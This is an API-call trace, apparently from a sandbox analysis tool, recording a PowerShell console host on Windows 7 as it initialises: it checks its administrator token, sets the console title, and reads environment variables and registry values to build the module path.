	[0606.328] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0606.329] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x24d970 | out: lpConsoleScreenBufferInfo=0x24d970) returned 1
	[0607.328] GetVersionExW (in: lpVersionInformation=0x24d900*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x24d900*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0607.330] GetCurrentProcess () returned 0xffffffffffffffff
	[0607.331] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x24d998 | out: TokenHandle=0x24d998*=0x318) returned 1
	[0607.335] GetTokenInformation (in: TokenHandle=0x318, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x24d8b8 | out: TokenInformation=0x0, ReturnLength=0x24d8b8) returned 0
	[0607.336] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4372e0
	[0607.336] GetTokenInformation (in: TokenHandle=0x318, TokenInformationClass=0x8, TokenInformation=0x4372e0, TokenInformationLength=0x4, ReturnLength=0x24d8b8 | out: TokenInformation=0x4372e0, ReturnLength=0x24d8b8) returned 1
	[0607.338] DuplicateTokenEx (in: hExistingToken=0x318, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x24da18 | out: phNewToken=0x24da18*=0x2dc) returned 1
	[0607.338] GetTokenInformation (in: TokenHandle=0x318, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x24d8b8 | out: TokenInformation=0x0, ReturnLength=0x24d8b8) returned 0
	[0607.338] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x437290
	[0607.338] GetTokenInformation (in: TokenHandle=0x318, TokenInformationClass=0x8, TokenInformation=0x437290, TokenInformationLength=0x4, ReturnLength=0x24d8b8 | out: TokenInformation=0x437290, ReturnLength=0x24d8b8) returned 1
	[0607.339] CheckTokenMembership (in: TokenHandle=0x2dc, SidToCheck=0x2e0b798*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x24da28 | out: IsMember=0x24da28) returned 1
	[0607.339] CloseHandle (hObject=0x2dc) returned 1
	[0607.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0607.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0607.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0607.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0608.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0608.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0608.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0608.310] CoTaskMemAlloc (cb=0x804) returned 0x1b8c3880
	[0608.310] GetConsoleTitleW (in: lpConsoleTitle=0x1b8c3880, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0608.311] CoTaskMemFree (pv=0x1b8c3880) 
	[0609.428] CoTaskMemAlloc (cb=0x804) returned 0x1b8c4130
	[0609.428] GetConsoleTitleW (in: lpConsoleTitle=0x1b8c4130, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0609.428] CoTaskMemFree (pv=0x1b8c4130) 
	[0609.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0609.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0609.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0609.431] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0609.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0609.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0609.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0609.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0609.570] SetConsoleCtrlHandler (HandlerRoutine=0x22568dc, Add=1) returned 1
	[0609.588] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x31c
	[0610.454] CoCreateGuid (in: pguid=0x24db10 | out: pguid=0x24db10*(Data1=0x9b313626, Data2=0x83c, Data3=0x4ed6, Data4=([0]=0x88, [1]=0xed, [2]=0xbf, [3]=0x18, [4]=0xa2, [5]=0xe1, [6]=0xc4, [7]=0xd2))) returned 0x0
	[0610.455] CoTaskMemAlloc (cb=0x104) returned 0x1b8c08b0
	[0610.455] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c08b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0610.455] CoTaskMemFree (pv=0x1b8c08b0) 
	[0610.459] WinSqmIsOptedIn () returned 0x0
	[0610.459] CoTaskMemAlloc (cb=0x104) returned 0x1b8c08b0
	[0610.459] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c08b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0610.459] CoTaskMemFree (pv=0x1b8c08b0) 
	[0610.460] CoTaskMemAlloc (cb=0x104) returned 0x1b8c08b0
	[0610.460] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c08b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0610.460] CoTaskMemFree (pv=0x1b8c08b0) 
	[0610.461] CoTaskMemAlloc (cb=0x104) returned 0x1b8c08b0
	[0610.461] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c08b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0610.462] CoTaskMemFree (pv=0x1b8c08b0) 
	[0610.579] CoTaskMemAlloc (cb=0x104) returned 0x1b8c08b0
	[0610.579] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c08b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0610.579] CoTaskMemFree (pv=0x1b8c08b0) 
	[0610.580] CoTaskMemAlloc (cb=0x104) returned 0x1b8c08b0
	[0610.580] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c08b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0610.580] CoTaskMemFree (pv=0x1b8c08b0) 
	[0610.581] CoTaskMemAlloc (cb=0x104) returned 0x1b8c08b0
	[0610.581] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c08b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0610.581] CoTaskMemFree (pv=0x1b8c08b0) 
	[0610.582] CoTaskMemAlloc (cb=0x104) returned 0x1b8c08b0
	[0610.582] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c08b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0610.582] CoTaskMemFree (pv=0x1b8c08b0) 
	[0610.583] CoTaskMemAlloc (cb=0x104) returned 0x1b8c08b0
	[0610.583] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c08b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0610.583] CoTaskMemFree (pv=0x1b8c08b0) 
	[0610.591] CoTaskMemAlloc (cb=0x104) returned 0x1b8c08b0
	[0610.591] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c08b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0610.591] CoTaskMemFree (pv=0x1b8c08b0) 
	[0611.341] CoTaskMemAlloc (cb=0x104) returned 0x1b8c08b0
	[0611.341] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c08b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0611.341] CoTaskMemFree (pv=0x1b8c08b0) 
	[0611.342] CoTaskMemAlloc (cb=0x104) returned 0x1b8c08b0
	[0611.342] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c08b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0611.342] CoTaskMemFree (pv=0x1b8c08b0) 
	[0611.343] CoTaskMemAlloc (cb=0x104) returned 0x1b8c08b0
	[0611.343] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c08b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0611.343] CoTaskMemFree (pv=0x1b8c08b0) 
	[0615.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0616.231] CoTaskMemAlloc (cb=0x104) returned 0x1b8c08b0
	[0616.231] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1b8c08b0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0616.231] CoTaskMemFree (pv=0x1b8c08b0) 
	[0616.233] CoTaskMemAlloc (cb=0xcc) returned 0x1b8cc310
	[0616.233] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b8cc310, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0616.233] CoTaskMemFree (pv=0x1b8cc310) 
	[0616.233] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d688 | out: phkResult=0x24d688*=0x2e8) returned 0x0
	[0616.233] RegQueryValueExW (in: hKey=0x2e8, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x24d60c, lpData=0x0, lpcbData=0x24d608*=0x0 | out: lpType=0x24d60c*=0x2, lpData=0x0, lpcbData=0x24d608*=0x6c) returned 0x0
	[0616.233] CoTaskMemAlloc (cb=0x70) returned 0x4701a0
	[0616.233] RegQueryValueExW (in: hKey=0x2e8, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x24d5dc, lpData=0x4701a0, lpcbData=0x24d5d8*=0x6c | out: lpType=0x24d5dc*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x24d5d8*=0x6c) returned 0x0
	[0616.233] CoTaskMemFree (pv=0x4701a0) 
	[0616.234] CoTaskMemAlloc (cb=0xcc) returned 0x1b8cc310
	[0616.234] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b8cc310, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0616.234] CoTaskMemFree (pv=0x1b8cc310) 
	[0616.234] CoTaskMemAlloc (cb=0xcc) returned 0x1b8cc310
	[0616.234] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b8cc310, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0616.234] CoTaskMemFree (pv=0x1b8cc310) 
	[0616.875] RegCloseKey (hKey=0x2e8) returned 0x0
	[0616.875] CoTaskMemAlloc (cb=0xcc) returned 0x1b8cc310
	[0616.875] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b8cc310, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0616.875] CoTaskMemFree (pv=0x1b8cc310) 
	[0616.875] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d688 | out: phkResult=0x24d688*=0x2e8) returned 0x0
	[0616.876] RegQueryValueExW (in: hKey=0x2e8, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x24d60c, lpData=0x0, lpcbData=0x24d608*=0x0 | out: lpType=0x24d60c*=0x0, lpData=0x0, lpcbData=0x24d608*=0x0) returned 0x2
	[0616.876] RegCloseKey (hKey=0x2e8) returned 0x0
	[0616.879] CoTaskMemAlloc (cb=0x20c) returned 0x4c5120
	[0616.879] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x4c5120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0616.881] CoTaskMemFree (pv=0x4c5120) 
	[0616.881] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x24d210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0616.882] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0616.892] CoTaskMemAlloc (cb=0x104) returned 0x1b8c08b0
	[0616.892] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c08b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0616.892] CoTaskMemFree (pv=0x1b8c08b0) 
	[0616.893] CoTaskMemAlloc (cb=0x104) returned 0x1b8c08b0
	[0616.893] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c08b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0616.893] CoTaskMemFree (pv=0x1b8c08b0) 
	[0616.896] CoTaskMemAlloc (cb=0x104) returned 0x1b8c08b0
	[0616.896] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c08b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0616.896] CoTaskMemFree (pv=0x1b8c08b0) 
	[0616.896] CoTaskMemAlloc (cb=0x104) returned 0x1b8c08b0
	[0616.896] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c08b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0616.896] CoTaskMemFree (pv=0x1b8c08b0) 
	[0616.898] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d478 | out: phkResult=0x24d478*=0x320) returned 0x0
	[0616.899] RegQueryValueExW (in: hKey=0x320, lpValueName="path", lpReserved=0x0, lpType=0x24d48c, lpData=0x0, lpcbData=0x24d488*=0x0 | out: lpType=0x24d48c*=0x1, lpData=0x0, lpcbData=0x24d488*=0x74) returned 0x0
	[0616.899] RegQueryValueExW (in: hKey=0x320, lpValueName="path", lpReserved=0x0, lpType=0x24d3fc, lpData=0x0, lpcbData=0x24d3f8*=0x0 | out: lpType=0x24d3fc*=0x1, lpData=0x0, lpcbData=0x24d3f8*=0x74) returned 0x0
	[0616.899] CoTaskMemAlloc (cb=0x78) returned 0x4701a0
	[0616.899] RegQueryValueExW (in: hKey=0x320, lpValueName="path", lpReserved=0x0, lpType=0x24d3cc, lpData=0x4701a0, lpcbData=0x24d3c8*=0x74 | out: lpType=0x24d3cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x24d3c8*=0x74) returned 0x0
	[0616.899] CoTaskMemFree (pv=0x4701a0) 
